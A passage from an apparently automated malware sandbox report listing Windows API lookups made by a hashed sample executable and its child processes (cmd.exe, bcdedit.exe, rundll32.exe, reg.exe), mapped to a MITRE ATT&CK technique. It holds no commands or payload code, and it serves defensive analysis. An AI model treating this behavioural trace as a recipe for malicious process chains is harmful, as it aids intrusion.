GetIpForwardTable2 (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"GetProcAddress\" with a parameter GetIpNetEntry2 (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"GetProcAddress\" with a parameter FreeMibTable (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"GetProcAddress\" with a parameter CoTaskMemFree (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"GetProcAddress\" with a parameter NsiFreeTable (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"GetProcAddress\" with a parameter CoUninitialize (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"GetProcAddress\" with a parameter ResetEvent (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"GetProcAddress\" with a parameter SslDecrementProviderReferenceCount (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"GetProcAddress\" with a parameter SslFreeObject (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"GetProcAddress\" with a parameter shutdown (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"GetProcAddress\" with a parameter OleInitialize (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsW (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"GetProcAddress\" with a parameter EventRegister (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"GetProcAddress\" with a parameter EventUnregister (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"GetProcAddress\" with a parameter EventEnabled (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"GetProcAddress\" with a parameter EventWrite (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockShared (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockShared (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"GetProcAddress\" with a parameter EventSetInformation (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"GetProcAddress\" with a parameter InitCommonControlsEx (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"GetProcAddress\" with a parameter OleUninitialize (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00005808)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00005288)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00005288)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00005288)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005288)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00005288)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005288)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00005288)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00005288)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00005288)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00005288)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00005288)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00005288)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00005288)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00005288)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00005288)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00005288)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00005288)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00005288)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00005288)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00005288)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00005288)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00005288)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00005288)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00005288)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00005288)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00005288)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00005288)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00005288)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00005288)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00005288)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00005288)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00005288)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00005288)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00005288)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00005288)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00005288)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00005288)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00005288)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00005288)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00005288)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00005288)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00005288)\n \"bcdedit.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005376)\n \"bcdedit.exe\" called \"GetProcAddress\" with a parameter GetCharABCWidthsI (UID: 00000000-00005376)\n \"bcdedit.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSEnableIME (UID: 00000000-00005376)\n \"bcdedit.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSGetEnableStatus (UID: 00000000-00005376)\n \"bcdedit.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExW (UID: 00000000-00005376)\n \"bcdedit.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExA (UID: 00000000-00005376)\n \"bcdedit.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEW (UID: 00000000-00005376)\n \"bcdedit.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEA (UID: 00000000-00005376)\n \"bcdedit.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEW (UID: 00000000-00005376)\n \"bcdedit.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEA (UID: 00000000-00005376)\n \"bcdedit.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEW (UID: 00000000-00005376)\n \"bcdedit.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEA (UID: 00000000-00005376)\n \"bcdedit.exe\" called \"GetProcAddress\" with a parameter ImmAssociateContext (UID: 00000000-00005376)\n \"bcdedit.exe\" called \"GetProcAddress\" with a parameter ImmEscapeA (UID: 00000000-00005376)\n \"bcdedit.exe\" called \"GetProcAddress\" with a parameter ImmEscapeW (UID: 00000000-00005376)\n \"bcdedit.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringA (UID: 00000000-00005376)\n \"bcdedit.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringW (UID: 00000000-00005376)\n \"bcdedit.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionWindow (UID: 00000000-00005376)\n \"bcdedit.exe\" called \"GetProcAddress\" with a parameter ImmGetContext (UID: 00000000-00005376)\n \"bcdedit.exe\" called \"GetProcAddress\" with a parameter ImmGetDefaultIMEWnd (UID: 00000000-00005376)\n \"bcdedit.exe\" called \"GetProcAddress\" with a parameter ImmIsIME (UID: 00000000-00005376)\n \"bcdedit.exe\" called \"GetProcAddress\" with a parameter ImmReleaseContext (UID: 00000000-00005376)\n \"bcdedit.exe\" called \"GetProcAddress\" with a parameter ImmRegisterClient (UID: 00000000-00005376)\n \"bcdedit.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontW (UID: 00000000-00005376)\n \"bcdedit.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontA (UID: 00000000-00005376)\n \"bcdedit.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontW (UID: 00000000-00005376)\n \"bcdedit.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontA (UID: 00000000-00005376)\n \"bcdedit.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionWindow (UID: 00000000-00005376)\n \"bcdedit.exe\" called \"GetProcAddress\" with a parameter ImmNotifyIME (UID: 00000000-00005376)\n \"bcdedit.exe\" called \"GetProcAddress\" with a parameter ImmLockIMC (UID: 00000000-00005376)\n \"bcdedit.exe\" called \"GetProcAddress\" with a parameter ImmUnlockIMC (UID: 00000000-00005376)\n \"bcdedit.exe\" called \"GetProcAddress\" with a parameter ImmLoadIME (UID: 00000000-00005376)\n \"bcdedit.exe\" called \"GetProcAddress\" with a parameter ImmSetOpenStatus (UID: 00000000-00005376)\n \"bcdedit.exe\" called \"GetProcAddress\" with a parameter ImmFreeLayout (UID: 00000000-00005376)\n \"bcdedit.exe\" called \"GetProcAddress\" with a parameter ImmActivateLayout (UID: 00000000-00005376)\n \"bcdedit.exe\" called \"GetProcAddress\" with a parameter ImmGetCandidateWindow (UID: 00000000-00005376)\n \"bcdedit.exe\" called \"GetProcAddress\" with a parameter ImmSetCandidateWindow (UID: 00000000-00005376)\n \"bcdedit.exe\" called \"GetProcAddress\" with a parameter ImmConfigureIMEW (UID: 00000000-00005376)\n \"bcdedit.exe\" called \"GetProcAddress\" with a parameter ImmGetConversionStatus (UID: 00000000-00005376)\n \"bcdedit.exe\" called \"GetProcAddress\" with a parameter ImmSetConversionStatus (UID: 00000000-00005376)\n \"bcdedit.exe\" called \"GetProcAddress\" with a parameter ImmSetStatusWindowPos (UID: 00000000-00005376)\n \"bcdedit.exe\" called \"GetProcAddress\" with a parameter ImmGetImeInfoEx (UID: 00000000-00005376)\n \"bcdedit.exe\" called \"GetProcAddress\" with a parameter ImmLockImeDpi (UID: 00000000-00005376)\n \"bcdedit.exe\" called \"GetProcAddress\" with a parameter ImmUnlockImeDpi (UID: 00000000-00005376)\n \"bcdedit.exe\" called \"GetProcAddress\" with a parameter ImmGetOpenStatus (UID: 00000000-00005376)\n \"bcdedit.exe\" called \"GetProcAddress\" with a parameter ImmSetActiveContext (UID: 00000000-00005376)\n \"bcdedit.exe\" called \"GetProcAddress\" with a parameter ImmTranslateMessage (UID: 00000000-00005376)\n \"bcdedit.exe\" called \"GetProcAddress\" with a parameter ImmLoadLayout (UID: 00000000-00005376)\n \"bcdedit.exe\" called \"GetProcAddress\" with a parameter ImmProcessKey (UID: 00000000-00005376)\n \"bcdedit.exe\" called \"GetProcAddress\" with a parameter ImmPutImeMenuItemsIntoMappedFile (UID: 00000000-00005376)\n \"bcdedit.exe\" called \"GetProcAddress\" with a parameter ImmGetProperty (UID: 00000000-00005376)\n \"bcdedit.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringA (UID: 00000000-00005376)\n \"bcdedit.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringW (UID: 00000000-00005376)\n \"bcdedit.exe\" called \"GetProcAddress\" with a parameter ImmEnumInputContext (UID: 00000000-00005376)\n \"bcdedit.exe\" called \"GetProcAddress\" with a parameter ImmSystemHandler (UID: 00000000-00005376)\n \"bcdedit.exe\" called \"GetProcAddress\" with a parameter CtfImmTIMActivate (UID: 00000000-00005376)\n \"bcdedit.exe\" called \"GetProcAddress\" with a parameter CtfImmRestoreToolbarWnd (UID: 00000000-00005376)\n \"bcdedit.exe\" called \"GetProcAddress\" with a parameter CtfImmHideToolbarWnd (UID: 00000000-00005376)\n \"bcdedit.exe\" called \"GetProcAddress\" with a parameter CtfImmDispatchDefImeMessage (UID: 00000000-00005376)\n \"bcdedit.exe\" called \"GetProcAddress\" with a parameter CtfImmNotify (UID: 00000000-00005376)\n \"bcdedit.exe\" called \"GetProcAddress\" with a parameter CtfImmSetDefaultRemoteKeyboardLayout (UID: 00000000-00005376)\n \"bcdedit.exe\" called \"GetProcAddress\" with a parameter CtfImmGetCompatibleKeyboardLayout (UID: 00000000-00005376)\n \"bcdedit.exe\" called \"GetProcAddress\" with a parameter LpkTabbedTextOut (UID: 00000000-00005376)\n \"bcdedit.exe\" called \"GetProcAddress\" with a parameter LpkPSMTextOut (UID: 00000000-00005376)\n \"bcdedit.exe\" called \"GetProcAddress\" with a parameter LpkDrawTextEx (UID: 00000000-00005376)\n \"bcdedit.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00005376)\n \"bcdedit.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00005376)\n \"bcdedit.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00005376)\n \"bcdedit.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00005376)\n \"bcdedit.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00005376)\n \"bcdedit.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005376)\n \"bcdedit.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00005376)\n \"bcdedit.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00005376)\n \"bcdedit.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00005376)\n \"bcdedit.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00005376)\n \"bcdedit.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00005376)\n \"bcdedit.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00005376)\n \"bcdedit.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00005376)\n \"bcdedit.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00005376)\n \"bcdedit.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00005376)\n \"bcdedit.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00005376)\n \"bcdedit.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00005376)\n \"bcdedit.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00005376)\n \"bcdedit.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00005376)\n \"bcdedit.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00005376)\n \"bcdedit.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00005376)\n \"bcdedit.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00005376)\n \"bcdedit.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00005376)\n \"bcdedit.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00005376)\n \"bcdedit.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00005376)\n \"bcdedit.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00005376)\n \"bcdedit.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00005376)\n \"bcdedit.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00005376)\n \"bcdedit.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00005376)\n \"bcdedit.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00005376)\n \"bcdedit.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00005376)\n \"bcdedit.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00005376)\n \"bcdedit.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00005376)\n \"bcdedit.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00005376)\n \"bcdedit.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00005376)\n \"bcdedit.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00005376)\n \"bcdedit.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00005376)\n \"bcdedit.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00005376)\n \"bcdedit.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00005376)\n \"bcdedit.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00005376)\n \"bcdedit.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00005376)\n \"bcdedit.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00005376)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005364)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00005364)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00005364)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00005364)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00005364)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005364)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00005364)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00005364)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00005364)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00005364)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00005364)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00005364)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00005364)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00005364)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00005364)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00005364)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00005364)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00005364)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00005364)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00005364)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00005364)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00005364)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00005364)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00005364)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00005364)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00005364)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00005364)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00005364)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00005364)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00005364)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00005364)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00005364)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00005364)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00005364)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00005364)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00005364)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00005364)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00005364)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00005364)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00005364)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00005364)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00005364)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00005500)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00005500)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00005500)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005500)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00005500)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005500)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00005500)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00005500)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00005500)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00005500)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00005500)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00005500)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00005500)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00005500)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00005500)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00005500)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00005500)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00005500)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00005500)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00005500)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00005500)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00005500)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00005500)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00005500)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00005500)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00005500)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00005500)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00005500)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00005500)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00005500)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00005500)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00005500)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00005500)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00005500)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00005500)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00005500)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00005500)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00005500)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00005500)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00005500)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00005500)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00005500)\n \"reg.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005524)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"0d000e00844be66b@IPHLPAPI.DLL\"\n \"0f001000dc4be66b@IPHLPAPI.DLL\"\n \"0c000d00244ce66b@IPHLPAPI.DLL\"\n \"140015006c4ce66b@IPHLPAPI.DLL\"\n 